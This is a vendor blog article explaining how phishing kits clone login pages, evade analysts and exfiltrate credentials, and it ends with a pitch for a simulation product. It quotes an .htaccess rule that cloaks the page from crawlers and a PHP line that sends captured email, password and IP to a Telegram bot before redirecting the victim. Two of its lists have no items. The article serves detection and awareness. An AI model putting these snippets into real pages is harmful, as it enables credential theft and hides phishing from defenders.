← All articles

Anatomy of a modern phishing kit

GottaPhish Team · April 22, 2026

A "phishing kit" is the packaged, reusable codebase attackers deploy to clone a login page, harvest credentials and exfiltrate them. Understanding how these kits are built — and how they hide — makes it far easier to detect campaigns early and to build convincing defensive simulations.

What ships inside a kit

A typical kit is a ZIP archive dropped onto a compromised host or cheap hosting. Its structure is remarkably consistent:

kit/
├── index.php            # the cloned landing page
├── login.php            # form handler: captures + forwards credentials
├── assets/              # pixel-perfect copies of CSS, JS, logos, fonts
├── config.php           # exfil target (email, Telegram bot, remote URL)
├── antibots.php         # blocklists for crawlers, sandboxes, researchers
└── .htaccess            # rewrites, geo/IP filtering, hotlink protection

Modern kits are increasingly sold "as a service" (PhaaS — Phishing-as-a-Service), complete with subscription dashboards, updates and support.

The clone

The landing page is usually a byte-for-byte copy of a real login screen, captured with a site ripper or a headless browser. Two tells are common:

Advanced kits proxy the real site in real time (an adversary-in-the-middle setup with tools like Evilginx), relaying the victim's input to the genuine server and stealing the resulting session cookie — which defeats most MFA.

Anti-analysis layer

The antibots component is what keeps a kit alive. It filters visitors before serving the phishing page:

# .htaccess excerpt
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

This is why a URL that "looks dead" to a SOC analyst was fully live for the victim minutes earlier.

Credential capture and exfiltration

The handler validates just enough to look real, then ships the data. Exfil channels, in rough order of popularity:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Note the final redirect: after "login fails," the victim lands on the real site, assumes a typo, logs in successfully, and never suspects a thing.

Hosting and delivery

Kits favor disposable infrastructure: compromised WordPress sites, open redirects on trusted domains, newly registered look-alike domains, and increasingly legitimate services (Cloudflare Workers, IPFS, SharePoint, Google Docs) to borrow their reputation. Delivery pairs the kit with a lure — an invoice, an MFA "re-verification," a shared-document notification.

Defensive detection

Signals worth hunting for:

The uncomfortable truth: a well-built AiTM kit defeats SMS and app-based MFA by stealing the session token. Phishing-resistant methods — FIDO2 / passkeys — are the durable fix.

How GottaPhish helps

Modern phishing kits weaponize pixel-perfect clones and AiTM session theft that even defeat SMS and app-based MFA. GottaPhish and its expert support team help you meet exactly that threat: safe, fully audited simulations mirroring real kits — tokenized links, credential-capture flows, AiTM scenarios — with dashboards showing which lures land and where MFA holds. Our experts assist with setup, design scenarios that reproduce current PhaaS tradecraft, and help you interpret the results as targeted training and concrete detection-engineering signals for your SOC.